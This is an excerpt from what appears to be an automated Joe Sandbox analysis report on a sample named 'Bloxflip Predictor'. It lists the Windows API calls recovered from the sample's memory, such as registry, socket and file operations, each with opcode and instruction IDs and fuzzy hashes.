                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: b4489e3719978d59fbf2fdb501009dfe5e09149e7d2bbad83080bb799ea14f5e
                                            • Instruction ID: 1fa18be099de77eccaf2ff0ccd5d505331e4231f80ee98323d966f4b88cd81b2
                                            • Opcode Fuzzy Hash: b4489e3719978d59fbf2fdb501009dfe5e09149e7d2bbad83080bb799ea14f5e
                                            • Instruction Fuzzy Hash: 6721A472500204AEE7219F15DC84FBBFBECEF28714F04845AE9458BA51D735E54C8AB5
                                            APIs
                                            • CopyFileW.KERNEL32(?,?,?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BB1E6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: 8f29537a01a8d6229c5f38f75f775852ffc0ba22083d0a328dbdd7a70488ec12
                                            • Instruction ID: 547077bb62f4f7b371fe894ce19051305e7822dc54ac184becd8a2176c18ba4a
                                            • Opcode Fuzzy Hash: 8f29537a01a8d6229c5f38f75f775852ffc0ba22083d0a328dbdd7a70488ec12
                                            • Instruction Fuzzy Hash: 6C2171715093C45FDB12CB25DC50BA2BFE8AF06214F1884DAED85CB653D225E808C761
                                            APIs
                                            • GetAdaptersAddresses.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2871
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdaptersAddresses
                                            • String ID:
                                            • API String ID: 2506852604-0
                                            • Opcode ID: 691f4bed02478c2ec6ea1db6acf80958e9b2ca3647032f1dc061503748d72a42
                                            • Instruction ID: 9bbf69e0ac1362579c1f5190c89d5ece6a0aa2ac69897aecdc777f4843cbbb92
                                            • Opcode Fuzzy Hash: 691f4bed02478c2ec6ea1db6acf80958e9b2ca3647032f1dc061503748d72a42
                                            • Instruction Fuzzy Hash: AC21B3754093806FD7228B11DC44FA6FFB8EF56314F0884DBE9848B193D265A508CBB2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            • Opcode ID: 56a17f1453f33367204d978972e386ace27a20821794d2a5b271e6f1a2be217f
                                            • Instruction ID: fb0b72edb2d011c052ddb699f5159fc8e19d19393855f4422aab102d4af420e0
                                            • Opcode Fuzzy Hash: 56a17f1453f33367204d978972e386ace27a20821794d2a5b271e6f1a2be217f
                                            • Instruction Fuzzy Hash: 84215E715083849FE721CF25D844B62FFF8EF4A214F08889AED85CB662D375E948CB61
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE2006
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 433b7a7583c6c928aabfc160f4a4b9f7f7bd8aa9ba947eca602e84bc53d2504c
                                            • Instruction ID: d6315e749c5a34f4cbb8f18f649ccffd68f56a9a07922768b67246450d8580c6
                                            • Opcode Fuzzy Hash: 433b7a7583c6c928aabfc160f4a4b9f7f7bd8aa9ba947eca602e84bc53d2504c
                                            • Instruction Fuzzy Hash: 7C21A172500204AFEB31DF55DD44FAAFBACEF14714F04845AEE458B691D774E408CAB1
                                            APIs
                                            • SetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4DB3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            • Opcode ID: 61eb801eec544c7a1a1edac548070f6262c89baa83b4b6980e2d386e69bbfab1
                                            • Instruction ID: 3886c6481b141205ca038206f7c68fad6eee8ede9e056901c6b49e38f6559e0e
                                            • Opcode Fuzzy Hash: 61eb801eec544c7a1a1edac548070f6262c89baa83b4b6980e2d386e69bbfab1
                                            • Instruction Fuzzy Hash: 6C21C2715093846FEB22CB25CC44FA6BFA8EF56314F08849AE944DB192D374E508CB66
                                            APIs
                                            • WSAEventSelect.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1B56
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EventSelect
                                            • String ID:
                                            • API String ID: 31538577-0
                                            • Opcode ID: aa3d4d27db5a1285f070d493d9381a7f3fcacade1208d2a9d6c950b94751465b
                                            • Instruction ID: 1e1c6866d1c772cc766c2d7ca3faf7981e7298668dc083ec9c2fcb3fd2b9ea09
                                            • Opcode Fuzzy Hash: aa3d4d27db5a1285f070d493d9381a7f3fcacade1208d2a9d6c950b94751465b
                                            • Instruction Fuzzy Hash: 012192B1405384AFE722CB51CC44FA7BBACEF59714F08849BE945DB252D234E508CBB5
                                            APIs
                                            • shutdown.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE14D8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: shutdown
                                            • String ID:
                                            • API String ID: 2510479042-0
                                            • Opcode ID: 23e22485052e33ae1b866e4898e4f20755fa65071d23bc2f0e22b4ddf3fe61bb
                                            • Instruction ID: bbbc7e73663e5c265d2035261fe09759fd9437017cd6208c1292f6a70f3f44e4
                                            • Opcode Fuzzy Hash: 23e22485052e33ae1b866e4898e4f20755fa65071d23bc2f0e22b4ddf3fe61bb
                                            • Instruction Fuzzy Hash: B921F9B1508384AFE713CB10DC44FA6BFA8EF56724F0884DAE9859F152D374A949CBB1
                                            APIs
                                            • GetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4CCF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            • Opcode ID: 61eb801eec544c7a1a1edac548070f6262c89baa83b4b6980e2d386e69bbfab1
                                            • Instruction ID: 02348b46d220883150896064390c4681e521381f39aac4099e44000657dabb95
                                            • Opcode Fuzzy Hash: 61eb801eec544c7a1a1edac548070f6262c89baa83b4b6980e2d386e69bbfab1
                                            • Instruction Fuzzy Hash: E02192B15093846FEB22CB21DC44FA6BFA8EF55314F08849AE945DB292D374E508CB75
                                            APIs
                                            • WSAIoctl.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE198D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Ioctl
                                            • String ID:
                                            • API String ID: 3041054344-0
                                            • Opcode ID: 6ea49a678fcf1d22a558e1d10ea18153cb81cb4de4031920b845f5589041840c
                                            • Instruction ID: 2c06eea0cd62f8bac0e50ebedc5408f95fde6522a9f170f9ebd84bb9218828db
                                            • Opcode Fuzzy Hash: 6ea49a678fcf1d22a558e1d10ea18153cb81cb4de4031920b845f5589041840c
                                            • Instruction Fuzzy Hash: 52216D75500604AFEB21CF51DC84FA6FBE8EF18714F08896AED8A8B651D735E448CBB1
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3CAA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            • Opcode ID: 686fa08cad445d602cc1d92830cdc8373b5f9b5e0774fe5503bab9ea4d87e80f
                                            • Instruction ID: 65db40fe0f3ad9e1bba428776c7b93cdaeb2136ff2ccf240d4eabc6e51c2c210
                                            • Opcode Fuzzy Hash: 686fa08cad445d602cc1d92830cdc8373b5f9b5e0774fe5503bab9ea4d87e80f
                                            • Instruction Fuzzy Hash: 4621AF71508380AFE7228B51DC44FA6FFB8EF55314F08849AE9849B152D365E408CB71
                                            APIs
                                            • CreateMutexW.KERNEL32(?,?), ref: 011BAED9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: 653d098ee3b5afa491ba18f2a3aab2319c96a94fb704920d1d4e99d1006e746d
                                            • Instruction ID: e34bbd8da90a910e10dfc454f7b40e97e8264ff56224050f278704d629c66b63
                                            • Opcode Fuzzy Hash: 653d098ee3b5afa491ba18f2a3aab2319c96a94fb704920d1d4e99d1006e746d
                                            • Instruction Fuzzy Hash: 70219271504244AFEB25DF25DC85BA6FBE8EF18314F048469ED488B781D775E408CA72
                                            APIs
                                            • RasConnectionNotificationW.RASAPI32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1C2F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ConnectionNotification
                                            • String ID:
                                            • API String ID: 1402429939-0
                                            • Opcode ID: 8535f3e7d27ace29855dc347a2fd8abe8d29f2f3bc958dc3d71fdb3d7eb0a0e8
                                            • Instruction ID: 587fbce10bab2f2e92edb27b8011973e11d2a0f917eb69131f0e16535c93fc23
                                            • Opcode Fuzzy Hash: 8535f3e7d27ace29855dc347a2fd8abe8d29f2f3bc958dc3d71fdb3d7eb0a0e8
                                            • Instruction Fuzzy Hash: 0E21F6B14093846FE7228B10DC45FA6FFB8EF56314F0884DBE9849B153D275A908CBB1
                                            APIs
                                            • ReadFile.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0925
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 2d2b845966f6b75eafe5b41478490c7e0769af2ec9111599de9102bd1ce99f8e
                                            • Instruction ID: fef3530562774c57a614ca9eaa75b18867fbc8259af55a9418d007cac2987a29
                                            • Opcode Fuzzy Hash: 2d2b845966f6b75eafe5b41478490c7e0769af2ec9111599de9102bd1ce99f8e
                                            • Instruction Fuzzy Hash: AB219F71409384AFEB22CF51DC44FA7BFB8EF55714F08849AE9859B152D275A408CBB2
                                            APIs
                                            • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05EE2932
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Connect
                                            • String ID:
                                            • API String ID: 3144859779-0
                                            • Opcode ID: ad697a1bfa8057aa847b7ed0e012ce42102bb3e6a71b4fafe409d259965dcc7a
                                            • Instruction ID: d1ae0075413672270834d133dafa74eaf91b3d01a6d648ea53fc3f46171035bb
                                            • Opcode Fuzzy Hash: ad697a1bfa8057aa847b7ed0e012ce42102bb3e6a71b4fafe409d259965dcc7a
                                            • Instruction Fuzzy Hash: 3A218C754093809FDB22CF61D884AA2BFF4EF0A214F0984DEE9858B563D271A809DB61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            • Opcode ID: 9379940299089a969834a9b5c471c8e90dd49ed684294ad1429721839bc0a0be
                                            • Instruction ID: b9955e89495cc3b43e7c8e5c2dd647a4bb653a160bb7f45a32c42998e01ca530
                                            • Opcode Fuzzy Hash: 9379940299089a969834a9b5c471c8e90dd49ed684294ad1429721839bc0a0be
                                            • Instruction Fuzzy Hash: F9215E71504344AFEB21CF15DC84F62FBE8EF45614F08849AED89CB292E375E808CB61
                                            APIs
                                            • ioctlsocket.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE188F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            • Opcode ID: 36f4ca1b81c0d72bc2285d2d21fb6e831a41e3dc1c5c21cfecf68ebc9c17e673
                                            • Instruction ID: 0eea9bfde7b5eea39aa5c6dd2ad11679d2e728e638fa1d4f70dbd758782cd1d5
                                            • Opcode Fuzzy Hash: 36f4ca1b81c0d72bc2285d2d21fb6e831a41e3dc1c5c21cfecf68ebc9c17e673
                                            • Instruction Fuzzy Hash: 5D21A171409384AFD722CB11CC44FA6BFB8EF55314F08849AE9449B152D374A508CBA6
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAC2C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 010497c59f541961cc9d325be225f0aab94211b60d9f87d8f719b1093f03d64d
                                            • Instruction ID: 3d0276a39251e254dd7674b91ca6fb58ae48510d772d918bd9c3a10cef3633e2
                                            • Opcode Fuzzy Hash: 010497c59f541961cc9d325be225f0aab94211b60d9f87d8f719b1093f03d64d
                                            • Instruction Fuzzy Hash: 5F219075600204AFEB31CF15DC85FA6BBECEF18710F08845AE949CB651D770E908CAB1
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BA5B8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: e364f7f3e31e562c7b62d9325ad26cb5235616851796b0f86557517b44b8f4c0
                                            • Instruction ID: 5b4f8104bcd024076d160542a835b8faea2493ea2f8a8cfec5569cc398dc914c
                                            • Opcode Fuzzy Hash: e364f7f3e31e562c7b62d9325ad26cb5235616851796b0f86557517b44b8f4c0
                                            • Instruction Fuzzy Hash: 8F11A272500204AFEB21CF55DC84FAAB7ECEF28714F04846AE945CB651D775E5488BB1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileView
                                            • String ID:
                                            • API String ID: 3314676101-0
                                            • Opcode ID: ebfbd09c728c0dc04f60bf35a8f0ec0c18d49c55589ceaea0a68ceb4376beb50
                                            • Instruction ID: 0102078954310dd7b89b33d1b71a2fd449a21d3947b7026fa59d712fff005f41
                                            • Opcode Fuzzy Hash: ebfbd09c728c0dc04f60bf35a8f0ec0c18d49c55589ceaea0a68ceb4376beb50
                                            • Instruction Fuzzy Hash: F621C071500204AFEB21CF55DC45FA6FBE8EF28324F04845EE9898B651E375E548CBB1
                                            APIs
                                            • K32GetModuleInformation.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2DF6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationModule
                                            • String ID:
                                            • API String ID: 3425974696-0
                                            • Opcode ID: bb95f356c83e8cfeb6f5a62f47f755222588bbc00526dd70daa698f47d4c3292
                                            • Instruction ID: ee9818ed99ff9f933ff72918bbd2b384c926e95f621d336cd540eb2daf3c9e5e
                                            • Opcode Fuzzy Hash: bb95f356c83e8cfeb6f5a62f47f755222588bbc00526dd70daa698f47d4c3292
                                            • Instruction Fuzzy Hash: 5F11B175600204AFEB21CF15CC84FAAB7ECEF24714F04846AEE49CB651D770E8088AB1
                                            APIs
                                            • WSASocketW.WS2_32(?,?,?,?,?), ref: 05EE0C6E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Socket
                                            • String ID:
                                            • API String ID: 38366605-0
                                            • Opcode ID: 99a661b6a3a1859c7cdaaba758d0cdd901e528596e6bfef4b579232bd7531cc6
                                            • Instruction ID: 79e72351cb8fdadedf354f3376e17d4be6d25fdd148bf8cba5e5b6fbd3d1ea7e
                                            • Opcode Fuzzy Hash: 99a661b6a3a1859c7cdaaba758d0cdd901e528596e6bfef4b579232bd7531cc6
                                            • Instruction Fuzzy Hash: 0721D171500200AFEB21CF55DD45FA6FBE8EF18324F04885EED858A651D371E408CB72
                                            APIs
                                            • RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 05EE1D05
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CurrentOpenUser
                                            • String ID:
                                            • API String ID: 1571386571-0
                                            • Opcode ID: 4351d59dc71eae4f2575c22ff5f59e0b522c0cae02af8b22670e87e791c71706
                                            • Instruction ID: 0bd86ea508c081caf4862970ae23d8a7301922984452e65ecd0482ea8c2e1596
                                            • Opcode Fuzzy Hash: 4351d59dc71eae4f2575c22ff5f59e0b522c0cae02af8b22670e87e791c71706
                                            • Instruction Fuzzy Hash: 2911D0B1500204AFEB20DF54DD44FBAFBACEF14324F08849AED488B641E374E448CAB2
                                            APIs
                                            • SendMessageTimeoutA.USER32(?,00000E24), ref: 011BB115
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: MessageSendTimeout
                                            • String ID:
                                            • API String ID: 1599653421-0
                                            • Opcode ID: fa8fa7fa6133c8155fc905eb66d540fa475174b6ba579311f81af4f8389c8f30
                                            • Instruction ID: 0e79af7b92ca80d3fd0941291f556f547f4b8a8b7f18efe1af9e4688cbebf011
                                            • Opcode Fuzzy Hash: fa8fa7fa6133c8155fc905eb66d540fa475174b6ba579311f81af4f8389c8f30
                                            • Instruction Fuzzy Hash: CB21D671504304AFEB318F50DC85FA6FBE8EF18714F18845AEE498AA51D375E418CB75
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0FB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: f1fd0b8e13d4e8dd06dcc7620854f3c59ce917d75b79e987377ca8a498acbfbe
                                            • Instruction ID: d248cb0547bb391f085184783ea10373f77ed8a07b5d68e79f309ce291f53372
                                            • Opcode Fuzzy Hash: f1fd0b8e13d4e8dd06dcc7620854f3c59ce917d75b79e987377ca8a498acbfbe
                                            • Instruction Fuzzy Hash: 54118E72500204AFEB21CF55CC89FA6F7E8EF28724F08845AE9858B751D7B0E518CAB1
                                            APIs
                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1F10
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ChangeNotifyValue
                                            • String ID:
                                            • API String ID: 3933585183-0
                                            • Opcode ID: 71991ec510ed4b089470784de20f8c2b94134ec381d3fdd121e4ff8d1c5b8671
                                            • Instruction ID: adaa207c2334ce1a1a5d0c9999e78628408edaff9efff84b16752fb2498e34ae
                                            • Opcode Fuzzy Hash: 71991ec510ed4b089470784de20f8c2b94134ec381d3fdd121e4ff8d1c5b8671
                                            • Instruction Fuzzy Hash: 1011D072500204AFEB21CF51DC44FAAFBECEF28728F04845AE9498B641D734E548CBB1
                                            APIs
                                            • RegSetValueExW.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAD18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 184247f59d0683e2d6951bbdd2fa562c72d14353b7aa08a6117062ed5fd5b6bd
                                            • Instruction ID: 9266334e73eba49c79b9664fce70e1f53c38b9ce406f69c0ba37f5092686307d
                                            • Opcode Fuzzy Hash: 184247f59d0683e2d6951bbdd2fa562c72d14353b7aa08a6117062ed5fd5b6bd
                                            • Instruction Fuzzy Hash: 56118E76500204AFEB318E15DC81FABBBECEF24714F08845AED459B652D761E408CAB1
                                            APIs
                                            • GetNetworkParams.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE23F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: NetworkParams
                                            • String ID:
                                            • API String ID: 2134775280-0
                                            • Opcode ID: cb2b4aa8462027b6f23c8060ba6d6e90e9e5e7e9277d4dea2fae6138fc21e1f1
                                            • Instruction ID: be038ff7035567c234e45f18ad0bd866f266044190a0dd7603d5d06288c82d65
                                            • Opcode Fuzzy Hash: cb2b4aa8462027b6f23c8060ba6d6e90e9e5e7e9277d4dea2fae6138fc21e1f1
                                            • Instruction Fuzzy Hash: 8C119675505384AFE7228B11DC44FA6FFB8EF55724F0880DAE9449B292D264A508CB71
                                            APIs
                                            • GetProcessTimes.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE17A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessTimes
                                            • String ID:
                                            • API String ID: 1995159646-0
                                            • Opcode ID: 6f58cff2607af9279ccd92be33bdf55f82b1b227f0ce3f2d7b8e609039c11e3d
                                            • Instruction ID: ea7962fb31ef462b6d2bda2df087498df050bb7d8d2f1700ee30a5ccffbeee9f
                                            • Opcode Fuzzy Hash: 6f58cff2607af9279ccd92be33bdf55f82b1b227f0ce3f2d7b8e609039c11e3d
                                            • Instruction Fuzzy Hash: E311D072600200AFEB21CF55DC44FAAFBE8EF29724F04846AE9498A651D771E448CBB1
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3BC2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            • Opcode ID: 49bc568818b103e12a9d64495c245b5b1709638d799c26faba0cdb1912bfab9b
                                            • Instruction ID: 7ac1aa72ab301a3ba105feb25466719750d9b866a2eb0dfa5932eba0db6ddfa0
                                            • Opcode Fuzzy Hash: 49bc568818b103e12a9d64495c245b5b1709638d799c26faba0cdb1912bfab9b
                                            • Instruction Fuzzy Hash: 8B11E671500240AFEB21CF11DC44FA6FBA8EF58714F14845AED458B641D775E408CA71
                                            APIs
                                            • WSAEventSelect.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1B56
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EventSelect
                                            • String ID:
                                            • API String ID: 31538577-0
                                            • Opcode ID: c28f08e22be4d5a1e54bff6bbb9d4228766088da5326c42d6613ea747cdca6f5
                                            • Instruction ID: adb5b15dd9654edc9f84f95f2f5f401a20014eae603ea27f0bd6bcad5413014f
                                            • Opcode Fuzzy Hash: c28f08e22be4d5a1e54bff6bbb9d4228766088da5326c42d6613ea747cdca6f5
